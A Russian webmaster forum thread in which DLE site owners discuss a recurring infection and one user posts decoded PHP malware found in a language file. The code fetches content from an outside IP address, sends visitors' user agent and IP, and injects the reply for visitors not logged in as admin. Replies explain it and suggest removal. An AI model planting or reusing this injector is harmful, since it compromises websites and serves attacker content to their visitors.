Как найти вирус DLE (видно в IE)

123
siv1987
На сайте с 02.04.2009
Offline
427
#11
Martyn911:
из этого кода видно что передается пароль админа

Интересно, а где видно, что передается пароль админа?...

M9
На сайте с 11.01.2012
Offline
10
#12
siv1987:
Интересно, а где видно, что передается пароль админа?...

вот разшифровал код (base64)

function getnewsfromid($id) {

$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}

function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("http://178.211.33.74/get_api.php?pid=2&")."br=".base64_encode($_SERVER***91;'HTTP_USER_AGENT'***93;)."&ip=".base64_encode($_SERVER***91;'REMOTE_ADDR'***93;);
if (!isset($_COOKIE***91;mysql_safe_connect("dle_password")***93;)) {
echo @file_get_contents($get);
}
}
}

я не эксперт в php, может dle_password это ключ для подключения к его апи, это догадки, к словам прошу не цепляться, я ничего не утверждаю кроме того что код был найден в website.lng

siv1987
На сайте с 02.04.2009
Offline
427
#13

Хеш пароля (кука dle_password) не передается, просто проверяется если она объявлена - проверка от авторизированых пользователей.

W
На сайте с 30.04.2007
Offline
138
#14

По ходу где-то шелл залит, снова. Та же проблема, причем, вирус чудом появляется и сам пропадает... В общем, будем искать..

F
На сайте с 07.02.2006
Offline
64
#15
Martyn911:
я не эксперт в php, может dle_password это ключ для подключения к его апи, это догадки, к словам прошу не цепляться, я ничего не утверждаю кроме того что код был найден в website.lng

Удаляйте.

Или можно просто закомментировать строку

//echo @file_get_contents($get); 


---------- Добавлено 16.06.2013 в 17:31 ----------

wildin:
Та же проблема, причем, вирус чудом появляется и сам пропадает...

По юзерагенту вероятно работает. И возможно в куках что то сохраняет, чтобы не показывать слишком часто одному и тому же.

Было в практике что то подобное.

Лечение сайтов от вирусов (http://fstrange.ru/coder/php/cure-joomla-phpshell.html) |Ремонт iPhone в Ростове (http://a-stor.ru/iphone/remont-iphone-5-v-rostove.html)
W
На сайте с 30.04.2007
Offline
138
#16
Милованов Ю.С:
Они потели, рыдали, но продолжали жрать кактус.
Выкиньте в топку Вы свой любименький DLE и возьмите че-нить по защищенней.

Вместе с сайтами? Жалко же.

По второму кругу эта наглая свинья лезет, снова появились. Не пойму, где может быть уязвимость, кто в курсе, подскажите?

p.s. Ой как хотелось бы эту свинью за жабры взять, которая гадостью такой занимается.

siv1987
На сайте с 02.04.2009
Offline
427
#17

wildin, шеллы ищите и закрывайте уязвимости. В закрепленной теме есть вся необходимая информация для этого. Если не справляетесь - обращайтесь к специалистам.

BrutalFlash
На сайте с 12.08.2010
Offline
35
#18

На каком хостинге сидите?

* ▲ ▲* ▲
R
На сайте с 24.09.2009
Offline
29
#19
Милованов Ю.С:
Они потели, рыдали, но продолжали жрать кактус.
Выкиньте в топку Вы свой любименький DLE и возьмите че-нить по защищенней.

А что вы порекомендуете?

Tibald
На сайте с 31.05.2008
Offline
101
#20

engine/classes/templates.class.php

Нашел сегодня тут эту шляпу.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий